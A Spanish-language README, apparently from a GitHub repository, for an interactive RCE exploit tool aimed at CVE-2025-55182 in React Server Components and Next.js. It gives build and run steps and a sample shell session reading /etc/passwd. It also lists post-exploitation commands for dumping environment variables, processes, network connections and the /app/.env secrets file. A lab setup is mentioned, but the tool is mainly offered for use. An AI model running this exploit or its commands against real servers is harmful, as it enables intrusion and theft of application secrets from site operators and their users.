
Herramienta de explotación de RCE dirigida a CVE-2025-55182, una vulnerabilidad crítica en React Server Components (RSC) que afecta a React 19.0.0 - 19.2.0 y a aplicaciones Next.js.
Herramienta interactiva de explotación RCE para CVE-2025-55182 (React Server Components)
CVE-2025-55182 es una herramienta mínima e interactiva de explotación RCE dirigida a CVE-2025-55182, una vulnerabilidad crítica en React Server Components (RSC) que afecta a React 19.0.0 - 19.2.0 y a aplicaciones Next.js.
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go
./CVE-2025-55182
_____________ _______________ _______________ ________ .________ .________.____________ ______ ________
╲_ ___ ╲ ╲ ╱ ╱╲_ _____╱ ╲_____ ╲ _ ╲ ╲_____ ╲ │ ____╱ │ ____╱│ ____╱_ │╱ __ ╲ ╲_____ ╲
╱ ╲ ╲╱╲ Y ╱ │ __)_ ______ ╱ ____╱ ╱_╲ ╲ ╱ ____╱ │____ ╲ ______ │____ ╲ │____ ╲ │ │> < ╱ ____╱
╲ ╲____╲ ╱ │ ╲ ╱_____╱ ╱ ╲ ╲_╱ ╲╱ ╲ ╱ ╲ ╱_____╱ ╱ ╲╱ ╲│ ╱ ── ╲╱ ╲
╲______ ╱ ╲___╱ ╱_______ ╱ ╲_______ ╲_____ ╱╲_______ ╲╱______ ╱ ╱______ ╱______ ╱│___╲______ ╱╲_______ ╲
╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱
React2Shell RCE | CVE-2025-55182
@hghost010
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] Target: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] VULNERABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)
ghost@rce $ whoami
node
ghost@rce $ pwd
/app
ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash
ghost@rce $ exit
https://github.com/user-attachments/assets/9cfdc436-9217-4921-bdbd-1368378f049f
Versiones afectadas:
Versiones parcheadas:
¿Quieres probarlo de forma segura? Configura un entorno de laboratorio vulnerable:
# Clona la aplicación Next.js vulnerable
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182
# Instala y ejecuta
npm install --legacy-peer-deps
npm run dev
# En otra terminal, ejecuta ghost-scanner
./CVE-2025-55182
# Introduce: localhost:3000
ghost@rce $ id # Comprueba los privilegios del usuario
ghost@rce $ whoami # Nombre de usuario actual
ghost@rce $ pwd # Directorio actual
ghost@rce $ ls -la # Lista los archivos
ghost@rce $ cat /etc/passwd # Lee archivos
ghost@rce $ uname -a # Información del sistema
ghost@rce $ env # Variables de entorno
ghost@rce $ ps aux # Procesos en ejecución
ghost@rce $ netstat -tulpn # Conexiones de red
ghost@rce $ cat /app/.env # Secretos de la aplicación
¿Encontraste un bug? Abre un issue
Si esta herramienta te ayudó:
Este proyecto está licenciado bajo la Licencia MIT; consulta el archivo LICENSE para más detalles.
Hecho con 👻 por Hghost0x00
Feliz hacking ⚡